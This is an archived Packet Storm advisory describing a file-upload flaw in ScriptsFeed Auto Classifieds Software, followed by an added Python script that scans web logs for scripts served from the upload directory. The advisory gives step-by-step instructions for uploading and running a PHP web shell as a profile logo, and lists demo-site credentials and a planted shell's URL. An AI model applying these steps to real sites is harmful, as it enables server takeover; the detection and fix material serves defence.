sfacs-upload.txt

2008-11-14T00:00:00
ID PACKETSTORM:71948
Type packetstorm
Reporter ZoRLu
Modified 2008-11-14T00:00:00

Description

                                        
`[~] ScriptsFeed (SF) Auto Classifieds Software Remote File Upload  
[~]  
[~] ----------------------------------------------------------  
[~] Discovered By: ZoRLu  
[~]  
[~] Date: 13.11.2008  
[~]  
[~] Home: www.z0rlu.blogspot.com  
[~]  
[~] contact: trt-turk@hotmail.com  
[~]  
[~] NOTE: LONELINESS LOST ITS MEANING IN MY LONELINESS : ( (  
[~]  
[~] my bug number now: 39  
[~]  
[~] my target bug number: 100  
[~]  
[~] -----------------------------------------------------------  
  
  
Exploit:  
  
http://localhost/script/cars_images/[id]_logo_your_shell.php  
  
Register on the site:  
  
register: http://localhost/script/register.php  
  
Then log in to the site:  
  
login: http://localhost/script/login.php  
  
Next, go to profile edit:  
  
profile: http://localhost/script/profile.php  
  
Upload your_shell.php, then right-click your logo, select Properties and copy the link.  
  
Paste the link into your browser and go to your_shell.php.  
  
your_shell.php path:  
  
http://localhost/script/cars_images/[id]_logo_your_shell.php  
  
  
  
rfu for demo:  
  
user: zorlu  
  
passwd: zorlu1  
  
shell path:  
  
http://www.scriptsfeed.com/demos/auto_classifieds_1/cars_images/1226597431_logo_c.php  
  
  
[~]----------------------------------------------------------------------  
[~] Greetz tO: str0ke & all Muslim HaCkeRs  
[~]  
[~] yildirimordulari.org & darkc0de.com  
[~]  
[~]----------------------------------------------------------------------  
  
`
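
Added example (not part of the original advisory and not ScriptsFeed code): a Python check a site operator can run over web-server access logs to find requests for non-image files under cars_images/, the directory the advisory shows uploaded logos being stored in. The combined log format, the extension lists and the sample log lines are assumptions constructed for illustration.

```python
import re
from pathlib import PurePosixPath
from urllib.parse import unquote

UPLOAD_DIR = "cars_images"                      # upload directory named in the advisory
IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif"}  # assumed legitimate logo types
# Assumed set of extensions the server may hand to the PHP interpreter.
SCRIPT_EXTS = {".php", ".phtml", ".php3", ".php4", ".php5", ".phar"}
# Apache/nginx common or combined log format (assumption about the server's logging).
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3})')


def is_suspicious_upload(path):
    """True for a file under cars_images/ whose name is not that of a plain image."""
    p = PurePosixPath(unquote(path.split("?", 1)[0]))  # drop query string, decode %xx
    if UPLOAD_DIR not in p.parts[:-1]:
        return False
    suffixes = [s.lower() for s in p.suffixes]
    last = suffixes[-1] if suffixes else ""
    # Flag a non-image final extension, and a script extension anywhere (x.php.jpg).
    return last not in IMAGE_EXTS or any(s in SCRIPT_EXTS for s in suffixes)


def scan_access_log(lines):
    """Return (client, path, status, served) for each suspicious request."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m and is_suspicious_upload(m.group(2)):
            status = int(m.group(3))
            hits.append((m.group(1), m.group(2), status, status < 400))
    return hits


# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Nov/2008:10:00:01 +0000] "POST /script/profile.php HTTP/1.1" 200 5120',
    '192.0.2.10 - - [14/Nov/2008:10:00:09 +0000] "GET /script/cars_images/1226597431_logo_c.php HTTP/1.1" 200 312',
    '198.51.100.7 - - [14/Nov/2008:10:02:44 +0000] "GET /script/cars_images/1226597500_logo_car.jpg HTTP/1.1" 200 48211',
    '198.51.100.9 - - [14/Nov/2008:10:03:02 +0000] "GET /script/cars_images/1226597600_logo_x.PHP.jpg?a=1 HTTP/1.1" 404 209',
]

if __name__ == "__main__":
    for client, path, status, served in scan_access_log(SAMPLE_LOG):
        print(f"{'SERVED' if served else 'probe '} {status} {client} {path}")
```

A hit with served set to True means the server answered a request for a non-image file in the upload directory. The corresponding fix is to accept only image types for the logo and to stop the web server from executing scripts in that directory.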